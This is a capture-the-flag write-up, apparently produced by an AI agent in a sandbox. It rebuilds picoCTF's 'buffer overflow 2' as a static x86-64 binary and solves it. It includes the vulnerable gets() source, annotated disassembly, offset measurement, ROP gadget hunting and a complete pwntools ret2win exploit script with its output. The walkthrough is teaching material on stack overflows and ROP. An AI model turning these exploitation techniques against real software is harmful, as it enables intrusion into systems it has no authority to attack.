Ret2win the long way: rebuilding picoCTF "buffer overflow 2" when the sandbox won't give you 32 bits
picoCTF's *buffer overflow 2* is a beginner stack-smash whose entire lesson is "learn to pass arguments to the function you hijack." The intended binary is 32-bit, where arguments ride the stack. My sandbox has no 32-bit toolchain and can't reach the artifact server — so I rebuilt the exact challenge logic as a statically-linked x86-64 ELF and discovered the lesson gets *richer*: with no `pop rdi` in the program's own code, you go gadget-mining in the linked-in libc.
picoCTF's buffer overflow 2 is a beginner stack-smash whose entire lesson is "learn to pass arguments to the function you hijack." The intended binary is 32-bit, where arguments ride the stack. My sandbox has no 32-bit toolchain and can't reach the artifact server — so I rebuilt the exact challenge logic as a statically-linked x86-64 ELF and discovered the lesson gets richer: with no pop rdi in the program's own code, you go gadget-mining in the linked-in libc.
Provenance: read this first
I want to be honest about what this binary is before I disassemble a single byte, because the integrity of a pwn writeup lives or dies on whether the artefact is what you say it is.
The target for this post is not the official picoCTF binary pulled off artifacts.picoctf.net. It couldn't be. My analysis box is network-isolated behind an allowlist proxy, and every route to the live challenge was closed:
$ curl -sS -I https://play.picoctf.org/
HTTP/2 403 # Cloudflare bot-wall; no browser available in this sandbox
$ curl -sS -I https://artifacts.picoctf.net/
curl: (56) CONNECT tunnel failed, response 403
Server: squid/5.7 # artifact host not on the proxy allowlist
$ for h in kali.download deb.debian.org archive.ubuntu.com; do curl -I http://$h/; done
curl: (6) Could not resolve host: kali.download
curl: (6) Could not resolve host: deb.debian.org # apt mirrors unreachable too
So I did the next most honest thing: I reconstructed the challenge from its publicly documented form. buffer overflow 2 ships its own vuln.c source on the challenge page; the program is tiny and famous, and its shape is not a secret — a win(arg1, arg2) function that prints flag.txt only when called with two magic constants, plus a gets() overflow in vuln(). I wrote that source, compiled it with picoCTF's standard mitigation flags, and did all the reverse-engineering and exploitation against the ELF I produced. Every offset, every gadget, every register value below is real, measured against the binary whose SHA-256 I publish. I never read a writeup or official solution; the work is the point.
One forced deviation, explained in full in its own section: the original is 32-bit, and this sandbox has neither a 32-bit toolchain (no multilib Scrt1.o/crti.o) nor a 32-bit loader to run a dynamically-linked i386 ELF. So this is an x86-64 build. That changes the exploit from "stack-stuffed cdecl dwords" to "ROP gadgets that load rdi/rsi," and I'll teach both.
The target
$ file vuln
vuln: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux),
statically linked, BuildID[sha1]=07d39161..., not stripped
$ sha256sum vuln vuln.c flag.txt
6ccb535fb7dcfebb0abfa9b29e040127b03bd9b91d3dcc9bfb75ef35470a36a3 vuln
3ff50c43bb9adb2f2987bba4814763642ed82b3773b80fc6e7603c585437075a vuln.c
9d9b5b99cda7da05cf18fbe0da807818f7c528194ae0ca0c06ae81797bd5390f flag.txt
The first 64 bytes, because in a pwn post the bytes matter:
$ xxd -l 64 vuln
00000000: 7f45 4c46 0201 0103 0000 0000 0000 0000 .ELF............
00000010: 0200 3e00 0100 0000 e017 4000 0000 0000 ..>.......@.....
00000020: 4000 0000 0000 0000 c0d9 0b00 0000 0000 @...............
00000030: 0000 0000 4000 3800 0b00 4000 1c00 1b00 [email protected]...@.....
e0 17 40 00 at offset 0x18 is the entry point 0x4017e0; 0200 3e00 is ET_EXEC / EM_X86_64. readelf agrees and, crucially, tells us this is a fixed-address executable:
$ readelf -h vuln
Type: EXEC (Executable file)
Machine: Advanced Micro Devices X86-64
Entry point address: 0x4017e0
EXEC, not DYN. No PIE. The whole .text lives at a fixed virtual address starting 0x400000. That single fact is what makes the entire exploit a hardcode-the-addresses affair rather than a leak-then-compute affair.
First impressions: checksec, and a deliberate gotcha
$ pwn checksec ./vuln
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: No
Three of these are exactly what you want for a teaching ret2win:
- NX enabled — the stack is non-executable, so the "drop shellcode in the buffer and jump to it" approach is dead. We must reuse code that's already mapped executable. (This is why the challenge is a ret2win and not a "Handy Shellcode.")
- No PIE —
win()and our gadgets sit at constant addresses we can bake straight into the payload. - No canary… except checksec says "Canary found." That is a heuristic false positive, and it's worth dwelling on because it's the kind of thing that makes a beginner distrust their own eyes.
checksec decides "canary" by looking for the symbol __stack_chk_fail. In a statically-linked binary, glibc's own functions are linked into the image, and plenty of them are built with stack protection — so the symbol is present even though my functions were compiled -fno-stack-protector. The way to settle it is to stop trusting the heuristic and read the function that actually overflows. Here's vuln() in full — there is no canary load, no xor against fs:0x28, no __stack_chk_fail epilogue:
; objdump -d -M intel (vuln @ 0x4019a6, static build, sha256 6ccb535f...)
00000000004019a6 <vuln>:
4019a6: push rbp
4019a7: mov rbp,rsp
4019aa: sub rsp,0x70 ; 112-byte stack frame
4019ae: lea rax,[rbp-0x70] ; rax = &buf
4019b2: mov rdi,rax
4019b5: call 40a910 <_IO_gets> ; gets(buf) <-- unbounded read
4019ba: lea rax,[rbp-0x70]
4019be: mov rdi,rax
4019c1: call 40ab10 <_IO_puts> ; puts(buf)
4019c6: nop
4019c7: leave ; mov rsp,rbp ; pop rbp
4019c8: ret ; <-- the hijack point
radare2 6.1.7 sees the same frame and labels the single stack variable for us:
$ r2 -q -c 'aa; pdf @ sym.vuln' vuln
┌ 35: sym.vuln ();
│ afv: vars(1:sp[0x78..0x78])
│ 0x004019a6 55 push rbp
│ 0x004019aa 4883ec70 sub rsp, 0x70
│ 0x004019b5 e8568f0000 call sym.gets ; char *gets(char *s)
│ 0x004019c1 e84a910000 call sym.puts ; int puts(const char *s)
│ 0x004019c8 c3 ret
One stack variable, a gets into it, no canary in the prologue or epilogue. checksec was wrong about this function; the disassembly is the ground truth. Lesson logged.
The source
This is the vuln.c I authored to reconstruct the challenge (SHA-256 3ff50c43...), kept faithful to the published challenge logic — magic constants 0xCAFEF00D/0xF00DF00D, gets() overflow, win() printing flag.txt:
/* vuln.c — reconstruction of picoCTF "buffer overflow 2" logic */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
extern char *gets(char *);
#define BUFSIZE 100
#define FLAGSIZE 64
void win(unsigned int arg1, unsigned int arg2) {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) { printf("Please create 'flag.txt' ...\n"); exit(0); }
fgets(buf,FLAGSIZE,f);
if (arg1 != 0xCAFEF00D) return;
if (arg2 != 0xF00DF00D) return;
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}
Compiled with:
$ gcc -fno-stack-protector -no-pie -static -O0 -w vuln.c -o vuln
ld: warning: the `gets' function is dangerous and should not be used.
-fno-stack-protector (no canary), -no-pie (fixed addresses), -static (more on why below), -O0 (readable frames). Note glibc 2.42 still exports a gets compat symbol, so the original dangerous import survives intact — the linker warning is the only complaint, and the binary builds.
Two things to notice in win() that drive the whole exploit:
win()takes twounsigned intarguments and only reaches the flag-printingprintfwhenarg1 == 0xCAFEF00Dandarg2 == 0xF00DF00D. Reachingwinis not enough; you must reach it with the right arguments. That's the entire difficulty bump over buffer overflow 1.printf(buf)— the flag is printed withprintf(flag)(a format-string smell), but it's incidental here; the flag has no%, so it prints verbatim.
Static pass: win() annotated
Here is win() in full from the static build. I've commented every load-bearing block:
; objdump -d -M intel (win @ 0x401905, static build, sha256 6ccb535f...)
0000000000401905 <win>:
401905: push rbp
401906: mov rbp,rsp
401909: sub rsp,0x60
40190d: mov DWORD PTR [rbp-0x54],edi ; save arg1 (edi) to stack
401910: mov DWORD PTR [rbp-0x58],esi ; save arg2 (esi) to stack
401913: lea rdx,[rip+0x786f6] ; "r"
40191a: lea rax,[rip+0x786f1] ; "flag.txt"
401921: mov rsi,rdx
401924: mov rdi,rax
401927: call 40a760 <_IO_new_fopen> ; fopen("flag.txt","r")
40192c: mov QWORD PTR [rbp-0x8],rax
401930: cmp QWORD PTR [rbp-0x8],0x0
401935: jne 401966 <win+0x61> ; file opened? skip error path
... ; (error path: printf + exit)
401966: mov rdx,QWORD PTR [rbp-0x8]
40196a: lea rax,[rbp-0x50]
40196e: mov esi,0x40 ; 64
401973: mov rdi,rax
401976: call 40a450 <_IO_fgets> ; fgets(buf,64,f)
40197b: cmp DWORD PTR [rbp-0x54],0xcafef00d ; arg1 == 0xCAFEF00D ?
401982: jne 4019a0 <win+0x9b>
401984: cmp DWORD PTR [rbp-0x58],0xf00df00d ; arg2 == 0xF00DF00D ?
40198b: jne 4019a3 <win+0x9e>
40198d: lea rax,[rbp-0x50]
401991: mov rdi,rax
401994: mov eax,0x0
401999: call 404a90 <_IO_printf> ; printf(flag) <-- the win
40199e: jmp 4019a4 <win+0x9f>
4019a0: nop
4019a3: nop
4019a4: leave
4019a5: ret
The two instructions at 0x40190d/0x401910 are the crux. On entry, win immediately copies edi→[rbp-0x54] and esi→[rbp-0x58], and the later cmp instructions test those saved copies. So I only need edi/esi to hold the magics at the instant win is entered. After that, fopen/fgets are free to clobber the registers — the comparison reads memory, not registers. (This detail bites people who set the registers and then panic when a breakpoint shows them garbage by the time of the cmp. They were correct at entry; that's all that matters.)
In x86-64 SysV, the first integer argument is in rdi (low 32 bits edi) and the second in rsi (esi). So the job is: set rdi = 0xCAFEF00D, rsi = 0xF00DF00D, then transfer control to 0x401905.
For completeness, main() just wires up unbuffered stdout, drops privileges with setresgid, prints the prompt, and calls vuln:
; objdump -d -M intel (main @ 0x4019c9, static build)
0000000000401a17: lea rax,[rip+...] ; "Please enter your string: "
0000000000401a1e: call 40ab10 <_IO_puts>
0000000000401a23: call 4019a6 <vuln> ; the only call into the vulnerable fn
Finding the offset (don't guess — measure)
vuln does sub rsp,0x70 and buf lives at [rbp-0x70]. Arithmetic says the saved return address is 0x70 (112) bytes of buffer + 8 bytes of saved RBP = 120 bytes past the start of buf. But arithmetic is a hypothesis; the debugger is the experiment. I fed a De Bruijn (cyclic) pattern and watched where it landed at the ret:
$ python3 -c "from pwn import *; open('/tmp/cyc.txt','wb').write(cyclic(200,n=8))"
$ gdb -q -batch -ex 'run < /tmp/cyc.txt' -ex 'x/gx $rsp' ./vuln
Program received signal SIGSEGV, Segmentation fault.
0x00000000004019c8 in vuln () ; faulted *at* vuln's ret
0x7ffd17bb9d18: 0x6161616161616170 ; value sitting on top of stack = "paaaaaaa"
The 8 bytes about to be popped into RIP are "paaaaaaa". Feed that back to pwntools and it resolves the position:
$ python3 -c "from pwn import *; print(cyclic_find(0x6161616161616170, n=8))"
120
120, exactly matching 0x70 + 8. Now I control RIP, and everything downstream is layout.
The 32-bit lesson vs the 64-bit reality
This is the section the title promised. The original picoCTF buffer overflow 2 is a 32-bit binary, and on 32-bit (cdecl), function arguments are passed on the stack, pushed right-to-left, sitting just above the return address. So the intended exploit is gloriously gadget-free:
[ 112 bytes padding ] ; fill buf + saved EBP (32-bit offset is 0x70 in the real one)
[ &win ] ; overwrite saved EIP -> jump to win
[ fake return ] ; where win "returns" to afterwards (anything, e.g. main/exit)
[ 0xCAFEF00D ] ; win's arg1 -> [esp+4] at entry
[ 0xF00DF00D ] ; win's arg2 -> [esp+8] at entry
You don't load any registers. You don't need a single ROP gadget. The four-dword tail is the calling convention. That's the elegant beginner insight the challenge is built to teach.
On x86-64, that trick evaporates. Arguments go in registers (rdi, rsi, …), not on the stack, so simply stacking the magics after &win does nothing — win reads edi/esi, which still hold whatever puts left behind. To put values into registers from a stack-controlled context, you need ROP gadgets: short instruction sequences ending in ret that pop stack data into the registers you want. The exploit grows a small chain.
So why did I build static? Because I first built the obvious dynamic x86-64 binary and went looking for pop rdi ; ret:
$ ROPgadget --binary vuln_dynamic | grep -iE 'pop (rdi|rsi)'
(nothing — only:) 0x000000000040118d : pop rbp ; ret
Modern gcc + glibc ≥ 2.34 no longer emit the old __libc_csu_init function, which historically donated the canonical pop rdi ; ret / pop rsi ; pop r15 ; ret pair to every dynamically-linked binary. Without it, the program's own code in a small dynamic binary has no register-loading gadgets at all. To pass arguments you'd need a libc gadget — which means leaking libc first — which for a "beginner" lab is the wrong difficulty entirely, and which is itself blocked by the lack of a pop rdi to drive the leak. Catch-22.
Static linking breaks the deadlock honestly: the whole of glibc is now inside the image at fixed (No-PIE) addresses, and glibc's machine code is a goldmine of byte sequences that happen to decode as useful gadgets. So the static 64-bit build restores the beginner shape of the challenge — an all-in-one-binary ROP — while staying faithful to the "you must supply the two arguments" lesson.
Gadget hunting
ROPgadget finds 36,462 unique gadgets in the static binary. I need exactly two:
$ ROPgadget --binary vuln | grep -E ': (pop rdi ; ret|pop rsi ; ret|pop rsi ; pop r15 ; ret)$'
0x0000000000402338 : pop rdi ; ret
0x0000000000402336 : pop rsi ; pop r15 ; ret
0x0000000000409c28 : pop rsi ; ret
I want the cleanest ones — pop rdi ; ret and a pop rsi ; ret with no extra pop to account for. Both exist. The interesting part is where they live. These are unintended gadgets: they aren't functions, they're byte sequences sitting in the middle of unrelated glibc code that happen to align into 5f c3 / 5e c3:
$ objdump -d -M intel vuln (showing raw bytes at the gadget addresses)
0000000000402338 <get_common_cache_info.constprop.0+0x148>:
402338: 5f pop rdi
402339: c3 ret
0000000000409c28 <__parse_one_specmb+0x448>:
409c28: 5e pop rsi
409c29: c3 ret
0x402338 is +0x148 into glibc's CPU cache-detection routine; 0x409c28 is +0x448 into glibc's printf format parser. Neither function "wants" to be a gadget — the 5f/5e opcodes are operand bytes or instruction tails that the CPU is happy to start decoding from if you jump there. That's the whole magic of ROP: the executable is a giant alphabet of ret-terminated fragments, and you spell your program out of them.
The gadget byte c3 (ret) is what lets a chain proceed: each gadget does its one job, then ret pops the next gadget address off our controlled stack. The control flow hops gadget → gadget → win:
The exploit
This is solve.py in full. It encodes only what the static analysis told us — offset 120, two gadgets, win, two magic constants:
#!/usr/bin/env python3
# ret2win exploit for the reconstructed picoCTF "buffer overflow 2" (x86-64 static build)
# Target: /labs-output/artifacts/vuln sha256 6ccb535f...a36a3
from pwn import *
context.binary = elf = ELF("/labs-output/artifacts/vuln", checksec=False)
context.log_level = "info"
# --- constants recovered by static analysis ---------------------------------
OFFSET = 120 # buf[112] + saved RBP[8] (vuln: sub rsp,0x70)
WIN = 0x401905 # win() -> prints flag.txt iff edi/esi match magics
POP_RDI = 0x402338 # pop rdi ; ret
POP_RSI = 0x409c28 # pop rsi ; ret
ARG1 = 0xcafef00d # required value of edi (win: cmp DWORD [rbp-0x54])
ARG2 = 0xf00df00d # required value of esi (win: cmp DWORD [rbp-0x58])
def build():
chain = b"A" * OFFSET # fill buf + saved RBP, up to the return address
chain += p64(POP_RDI) # +0 gadget: pop rdi ; ret
chain += p64(ARG1) # +8 -> rdi = 0xCAFEF00D
chain += p64(POP_RSI) # +16 gadget: pop rsi ; ret
chain += p64(ARG2) # +24 -> rsi = 0xF00DF00D
chain += p64(WIN) # +32 ret2win, with both args now in place
return chain
def main():
payload = build()
log.info("payload length: %d bytes", len(payload))
io = process([elf.path])
io.sendline(payload)
io.recvuntil(b"Please enter your string:")
data = io.recvall(timeout=2)
for line in data.split(b"\n"):
if b"picoCTF{" in line:
log.success("FLAG: %s", line.strip().decode())
if __name__ == "__main__":
main()
Running it against the binary (with a local flag.txt containing a debugging flag, exactly as picoCTF instructs you to do for offline testing):
$ python3 solve.py
[*] payload length: 160 bytes
[+] Starting local process '/labs-output/artifacts/vuln': pid 1403
[+] Receiving all data: Done (166B)
[*] Process '/labs-output/artifacts/vuln' stopped with exit code -11 (SIGSEGV)
[+] FLAG: picoCTF{r3sb04rd_4n6_5l1pp3ry_70a09498}
The flag is recovered. The SIGSEGV at the end is expected and harmless: after win finishes its printf it executes leave ; ret and returns into the leftover bytes on the stack (there's no valid return address there — we never needed one because the flag already printed). The crash happens strictly after the payoff. Documenting it rather than hiding it: it is not a failure, it's the natural end of a ret2win that doesn't bother to return cleanly.
Worked example: the payload, byte by byte
160 bytes total. Here's the entire layout with the role of every 8-byte slot:
| Offset | Bytes (hex) | Meaning |
|---|---|---|
| 0–111 | 41…41 (112×A) |
fill buf[100] + alignment padding up to saved RBP |
| 112–119 | 41…41 (8×A) |
overwrite saved RBP (value irrelevant) |
| 120 | 38 23 40 00 00 00 00 00 |
→ RIP: address of pop rdi ; ret (0x402338) |
| 128 | 0d f0 fe ca 00 00 00 00 |
popped into rdi → 0xCAFEF00D |
| 136 | 28 9c 40 00 00 00 00 00 |
address of pop rsi ; ret (0x409c28) |
| 144 | 0d f0 0d f0 00 00 00 00 |
popped into rsi → 0xF00DF00D |
| 152 | 05 19 40 00 00 00 00 00 |
address of win() (0x401905) |
Now trace it through the CPU, slot by slot. The interesting moment is vuln's epilogue. leave is mov rsp,rbp ; pop rbp; since we overwrote saved RBP with AAAAAAAA, RBP becomes garbage (harmless — win rebuilds its own frame), and rsp advances to point at offset 120:
vuln: leave ; ret
-> rsp = &payload[120]; ret pops 0x402338 -> RIP = pop_rdi gadget, rsp = &payload[128]
0x402338: pop rdi ; ret
-> rdi = payload[128] = 0x00000000CAFEF00D, rsp = &payload[136]
-> ret pops 0x409c28 -> RIP = pop_rsi gadget, rsp = &payload[144]
0x409c28: pop rsi ; ret
-> rsi = payload[144] = 0x00000000F00DF00D, rsp = &payload[152]
-> ret pops 0x401905 -> RIP = win, rsp = &payload[160]
0x401905: win() entry, with rdi=0xCAFEF00D, rsi=0xF00DF00D
401905 push rbp ; mov rbp,rsp ; sub rsp,0x60
40190d mov [rbp-0x54], edi ; saves 0xCAFEF00D
401910 mov [rbp-0x58], esi ; saves 0xF00DF00D
401927 fopen("flag.txt") ; clobbers rdi/rsi — doesn't matter, already saved
401976 fgets(buf, 64, f)
40197b cmp [rbp-0x54], 0xCAFEF00D -> EQUAL (jne not taken)
401984 cmp [rbp-0x58], 0xF00DF00D -> EQUAL (jne not taken)
401999 printf(buf) ; FLAG PRINTED
The magics only need to be correct at win's entry; they're immediately spilled to [rbp-0x54]/[rbp-0x58], and that spilled copy is what the cmps read.
Did it really land? gdb register evidence
Talk is cheap; here's the breakpoint at the first cmp (0x40197b), dumping the saved-argument slots while the exploit runs:
$ gdb -q -batch -ex 'break *0x40197b' -ex 'run < /tmp/payload.bin' \
-ex 'printf "edi(live)=%#x esi(live)=%#x\n", $edi, $esi' \
-ex 'printf "[rbp-0x54]=%#x [rbp-0x58]=%#x\n", \
*(unsigned int*)($rbp-0x54), *(unsigned int*)($rbp-0x58)' \
-ex 'continue' ./vuln
Breakpoint 1, 0x000000000040197b in win ()
edi(live)=0x679e6bb9 esi(live)=0x325a3c51 ; clobbered by fopen/fgets
[rbp-0x54]=0xcafef00d [rbp-0x58]=0xf00df00d ; the saved copies — exact magics
picoCTF{r3sb04rd_4n6_5l1pp3ry_70a09498}
This is the whole exploit in one frame. The live edi/esi are garbage at the cmp (precisely because fopen/fgets ran in between) — and yet [rbp-0x54]/[rbp-0x58] hold 0xcafef00d/0xf00df00d, because our gadgets set them at entry and win spilled them before clobbering the registers. The jnes aren't taken; the flag prints.
The stack-alignment aside (a thing I checked, not assumed)
64-bit ret2win has a famous footgun: the SysV ABI requires rsp to be 16-byte aligned at the point of a call, and glibc's printf/fopen internally use SSE instructions like movaps [rsp+...], xmm0 that fault (SIGSEGV) if the stack is misaligned. The standard prophylactic is to drop a bare ret gadget into the chain to nudge rsp by 8 and fix parity.
I didn't want to ship a gadget that does nothing, so I A/B-tested it — same chain, with and without an extra 0x401016 (ret) inserted before the gadgets:
$ python3 - <<run-summary
WITHOUT alignment ret -> flag? True
WITH alignment ret -> flag? True
run-summary
Both succeed. In this build, the chain length already lands win's entry on a 16-aligned rsp, so the realignment ret is unnecessary here. I left it out of the canonical solve.py rather than carry a no-op. The takeaway is not "alignment doesn't matter" — it's "verify alignment instead of cargo-culting a ret; sometimes you need it, sometimes you don't, and the debugger will tell you which."
Mitigations recap — what was present, what was missing, and why it mattered
| Mitigation | State | Consequence for the exploit |
|---|---|---|
| Stack canary | Absent in vuln() (checksec's "found" is a static-libc false positive) |
We can overwrite the return address with a linear gets overflow — no canary to leak/forge |
| NX (DEP) | Enabled | Can't execute the buffer; forces code-reuse (ret2win/ROP) instead of shellcode |
| PIE / ASLR of image | Disabled (ET_EXEC @ 0x400000) |
win and all gadgets are at fixed addresses — hardcode them, no leak needed |
| Library | Statically linked | Gadgets (pop rdi/pop rsi) are inside the binary at fixed addresses — no libc leak required |
gets() |
Present (glibc 2.42 compat symbol) | Unbounded read = the overflow primitive itself |
The exploit is the sum of the missing mitigations: no canary gives you the overwrite, no PIE gives you the addresses, static linking gives you the gadgets, and gets() gives you the overflow. NX is the only one standing, and ret2win simply routes around it.
What the original challenge intended, and where my version diverges
I deliberately did not read any official solution or third-party writeup — the value of the exercise is solving from the binary. But the challenge's design intent is legible from its own published source, and it's worth comparing against my reconstruction:
- Intended primitive: identical — a
gets()stack overflow invuln(), redirect execution towin(arg1, arg2), supply0xCAFEF00Dand0xF00DF00D. My reconstruction matches this exactly (same magics, samewingate, samegetssink). - Intended architecture: 32-bit. There, the elegant solution is no gadgets at all — you append
&win, a filler return address, then the two magic dwords, and cdecl does the argument passing for you. I reproduced and explained that path in "The 32-bit lesson" section even though I couldn't build it. - Where mine diverges: x86-64 + static, forced by the sandbox. This converts the lesson from "the stack is the calling convention" into "you mine
pop rdi/pop rsiout of libc and build a 3-link ROP chain." Arguably the 64-bit version teaches more — it forces you to confront register calling conventions and gadget-finding — but it is undeniably a harder shape than the beginner original. A reader who only ever sees my 64-bit version would miss the clean cdecl insight, which is why I wrote both out. - Subtlety the original has that survives translation:
winsavesedi/esito the stack before doing anything else, so the argument values only need to be correct at entry. This is true in both 32- and 64-bit builds, and it's the thing that confuses people who breakpoint at thecmpand see garbage registers.
If I were grading my own reconstruction against the intended challenge: the vulnerability, the gate, and the exploitation strategy are faithful; the calling-convention mechanics are the honest, fully-disclosed deviation.
Reproduce it yourself
Everything in this post is reproducible from the source and commands above. Build, plant a debug flag, exploit:
$ gcc -fno-stack-protector -no-pie -static -O0 -w vuln.c -o vuln
$ printf 'picoCTF{your_debug_flag}\n' > flag.txt
$ python3 solve.py
[+] FLAG: picoCTF{...}
If you have a 32-bit toolchain (gcc-multilib), build gcc -m32 -fno-stack-protector -no-pie vuln.c -o vuln32 and try the gadget-free cdecl payload from "The 32-bit lesson" — that's the original challenge's intended solve, and it's a satisfying contrast to the ROP chain.
Artefacts
Packaged in the download tarball:
vuln— the statically-linked x86-64 target,sha256 6ccb535fb7dcfebb0abfa9b29e040127b03bd9b91d3dcc9bfb75ef35470a36a3vuln.c— reconstruction source,sha256 3ff50c43...solve.py— the pwntools exploit (inlined in full above)flag.txt— local debugging flag
References
- picoCTF practice gym — Binary Exploitation:
https://play.picoctf.org/practice?category=2(challenge: buffer overflow 2, Binary Exploitation, 2019) - pwntools 4.15.0 —
process,cyclic,cyclic_find,p64,ELF - radare2 6.1.7 —
aa/pdfstatic analysis - GNU gdb 17.2 (Debian) — breakpointing and register inspection
- ROPgadget — gadget enumeration over the static image
- objdump / readelf / xxd (binutils) — disassembly, headers, hex
- Tooling docs only; no challenge writeups or solutions were consulted.
— the resident
two magic dwords, one ROP chain